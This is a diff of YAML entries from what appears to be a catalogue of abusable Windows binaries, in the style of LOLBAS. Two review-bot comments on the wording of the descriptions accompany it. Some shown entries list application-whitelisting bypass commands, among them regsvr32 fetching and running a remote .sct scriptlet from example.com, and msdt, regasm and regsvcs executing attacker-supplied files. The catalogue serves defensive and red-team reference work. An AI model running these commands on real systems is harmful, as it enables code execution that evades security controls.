Description: Build and execute a C# project stored in the target XML file. Description: Build and execute a C# project stored in the target XML file.
Usecase: Compile and run code Usecase: Compile and run code
Category: AWL bypass Category: AWL Bypass
Privileges: User Privileges: User
MitreID: T1127.001 MitreID: T1127.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -77,4 +77,3 @@ Acknowledgement:
Handle: '@Cneelis' Handle: '@Cneelis'
- Person: Jimmy - Person: Jimmy
Handle: '@bohops' Handle: '@bohops'
---


@ -24,4 +24,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Pierre-Alexandre Braeken - Person: Pierre-Alexandre Braeken
Handle: '@pabraeken' Handle: '@pabraeken'
---


@ -14,7 +14,7 @@ Commands:
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
Usecase: Execute code bypass Application whitelisting Usecase: Execute code bypass Application whitelisting
Category: AWL bypass Category: AWL Bypass
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -33,4 +33,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: - Person:
Handle: Handle:
---


@ -69,4 +69,3 @@ Acknowledgement:
Handle: '@subtee' Handle: '@subtee'
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
---


@ -51,4 +51,3 @@ Acknowledgement:
Handle: '@netbiosX' Handle: '@netbiosX'
- Person: Philip Tsukerman - Person: Philip Tsukerman
Handle: '@PhilipTsukerman' Handle: '@PhilipTsukerman'
---


@ -34,4 +34,3 @@ Acknowledgement:
Handle: Handle:
- Person: 'Xabier Ugarte-Pedrero' - Person: 'Xabier Ugarte-Pedrero'
Handle: Handle:
---


@ -36,4 +36,3 @@ Acknowledgement:
Handle: '@subtee' Handle: '@subtee'
- Person: Adam - Person: Adam
Handle: '@Hexacorn' Handle: '@Hexacorn'
---


@ -19,4 +19,3 @@ Detection:
Acknowledgement: Acknowledgement:
- Person: Elliot Killick - Person: Elliot Killick
Handle: '@elliotkillick' Handle: '@elliotkillick'
---


@ -21,4 +21,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Elliot Killick - Person: Elliot Killick
Handle: '@elliotkillick' Handle: '@elliotkillick'
---


@ -38,4 +38,3 @@ Acknowledgement:
Handle: '@kylehanslovan' Handle: '@kylehanslovan'
- Person: Fab - Person: Fab
Handle: '@0rbz_' Handle: '@0rbz_'
---


@ -22,4 +22,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Pierre-Alexandre Braeken - Person: Pierre-Alexandre Braeken
Handle: '@pabraeken' Handle: '@pabraeken'
---


@ -31,4 +31,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Derek Johnson - Person: Derek Johnson
Handle: '' Handle: ''
---


@ -22,4 +22,3 @@ Acknowledgement:
Handle: '@LuxNoBulIshit' Handle: '@LuxNoBulIshit'
- Person: Avihay eldad - Person: Avihay eldad
Handle: '@aloneliassaf' Handle: '@aloneliassaf'
---


@ -25,4 +25,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Casey Smith - Person: Casey Smith
Handle: '@subtee' Handle: '@subtee'
---


@ -40,4 +40,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
---


@ -28,4 +28,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Elliot Killick - Person: Elliot Killick
Handle: '@elliotkillick' Handle: '@elliotkillick'
---


@ -25,4 +25,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Leon Rodenko - Person: Leon Rodenko
Handle: '@L3m0nada' Handle: '@L3m0nada'
---


@ -24,4 +24,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: FireEye - Person: FireEye
Handle: '@FireEye' Handle: '@FireEye'
---


@ -41,4 +41,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Grzegorz Tworek - Person: Grzegorz Tworek
Handle: '@0gtweet' Handle: '@0gtweet'
---


@ -36,4 +36,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
---


@ -7,7 +7,7 @@ Commands:
- Command: regasm.exe AllTheThingsx64.dll - Command: regasm.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function. Description: Loads the target .DLL file and executes the RegisterClass function.
Usecase: Execute code and bypass Application whitelisting Usecase: Execute code and bypass Application whitelisting
Category: AWL bypass Category: AWL Bypass
Privileges: Local Admin Privileges: Local Admin
MitreID: T1218.009 MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -38,4 +38,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Casey Smith - Person: Casey Smith
Handle: '@subtee' Handle: '@subtee'
---


@ -32,4 +32,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
---


@ -25,4 +25,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Eli Salem - Person: Eli Salem
Handle: '@elisalem9' Handle: '@elisalem9'
---


@ -24,4 +24,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Philip Tsukerman - Person: Philip Tsukerman
Handle: '@PhilipTsukerman' Handle: '@PhilipTsukerman'
---


@ -14,7 +14,7 @@ Commands:
- Command: regsvcs.exe AllTheThingsx64.dll - Command: regsvcs.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function. Description: Loads the target .DLL file and executes the RegisterClass function.
Usecase: Execute dll file and bypass Application whitelisting Usecase: Execute dll file and bypass Application whitelisting
Category: AWL bypass Category: AWL Bypass
Privileges: Local Admin Privileges: Local Admin
MitreID: T1218.009 MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -34,4 +34,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Casey Smith - Person: Casey Smith
Handle: '@subtee' Handle: '@subtee'
---


@ -7,14 +7,14 @@ Commands:
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
Description: Execute the specified remote .SCT script with scrobj.dll. Description: Execute the specified remote .SCT script with scrobj.dll.
Usecase: Execute code from remote scriptlet, bypass Application whitelisting Usecase: Execute code from remote scriptlet, bypass Application whitelisting
Category: AWL bypass Category: AWL Bypass
Privileges: User Privileges: User
MitreID: T1218.010 MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
Description: Execute the specified local .SCT script with scrobj.dll. Description: Execute the specified local .SCT script with scrobj.dll.
Usecase: Execute code from scriptlet, bypass Application whitelisting Usecase: Execute code from scriptlet, bypass Application whitelisting
Category: AWL bypass Category: AWL Bypass
Privileges: User Privileges: User
MitreID: T1218.010 MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -57,4 +57,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Casey Smith - Person: Casey Smith
Handle: '@subtee' Handle: '@subtee'
---


@ -32,4 +32,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: elceef - Person: elceef
Handle: '@elceef' Handle: '@elceef'
---


@ -39,4 +39,3 @@ Acknowledgement:
Handle: '@splinter_code' Handle: '@splinter_code'
- Person: ap - Person: ap
Handle: '@decoder_it' Handle: '@decoder_it'
---


@ -91,4 +91,3 @@ Acknowledgement:
Handle: '@404death' Handle: '@404death'
- Person: Martin Ingesen - Person: Martin Ingesen
Handle: '@Mrtn9' Handle: '@Mrtn9'
---


@ -1,6 +1,6 @@
--- ---
Name: Runonce.exe Name: Runonce.exe
Description: Description: Executes a Run Once Task that has been configured in the registry
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: 2018-05-25 Created: 2018-05-25
Commands: Commands:
@ -27,4 +27,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Pierre-Alexandre Braeken - Person: Pierre-Alexandre Braeken
Handle: '@pabraeken' Handle: '@pabraeken'
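Review bot: The newly filled `Description: Executes a Run Once Task that has been configured in the registry` is written in the third person, while the other descriptions this commit fills in (`Execute target PowerShell script`, `Execute binary through proxy binary …`) use the imperative, so the three should agree on one form. `Description: Execute a run-once task that has been configured in the registry` keeps the imperative used elsewhere. The Commands and Resources stanzas of the Runonce.exe entry lie between the two hunks and are not shown.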
---


@ -1,6 +1,6 @@
--- ---
Name: Runscripthelper.exe Name: Runscripthelper.exe
Description: Description: Execute target PowerShell script
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: 2018-05-25 Created: 2018-05-25
Commands: Commands:
@ -26,4 +26,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Matt Graeber - Person: Matt Graeber
Handle: '@mattifestation' Handle: '@mattifestation'
---


@ -36,4 +36,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
---


@ -33,4 +33,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: - Person:
Handle: Handle:
---


@ -1,6 +1,6 @@
--- ---
Name: Scriptrunner.exe Name: Scriptrunner.exe
Description: Description: Execute binary through proxy binary to evade defensive counter measures
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: 2018-05-25 Created: 2018-05-25
Commands: Commands:
@ -33,4 +33,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Nick Tyrer - Person: Nick Tyrer
Handle: '@nicktyrer' Handle: '@nicktyrer'
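Review bot: `counter measures` in the new Scriptrunner.exe description should be one word: `Description: Execute binary through proxy binary to evade defensive countermeasures`. The entry's Commands and Resources stanzas sit between the two hunks and are outside the shown lines.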
---


@ -31,4 +31,3 @@ Acknowledgement:
Handle: '@hexacorn' Handle: '@hexacorn'
- Person: Elliot Killick - Person: Elliot Killick
Handle: '@elliotkillick' Handle: '@elliotkillick'
---


@ -22,4 +22,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Eral4m - Person: Eral4m
Handle: '@eral4m' Handle: '@eral4m'
---


@ -25,4 +25,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Nick Landers - Person: Nick Landers
Handle: '@monoxgas' Handle: '@monoxgas'
---


@ -35,4 +35,3 @@ Acknowledgement:
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
- Person: Maxime Nadeau - Person: Maxime Nadeau
Handle: '@m_nad0' Handle: '@m_nad0'
---


@ -37,4 +37,3 @@ Acknowledgement:
Handle: '@oulusoyum' Handle: '@oulusoyum'
- Person: Matt Graeber - Person: Matt Graeber
Handle: '@mattifestation' Handle: '@mattifestation'
---


@ -31,4 +31,3 @@ Acknowledgement:
Handle: Handle:
- Person: Hai Vaknin(Lux) - Person: Hai Vaknin(Lux)
Handle: Handle:
---
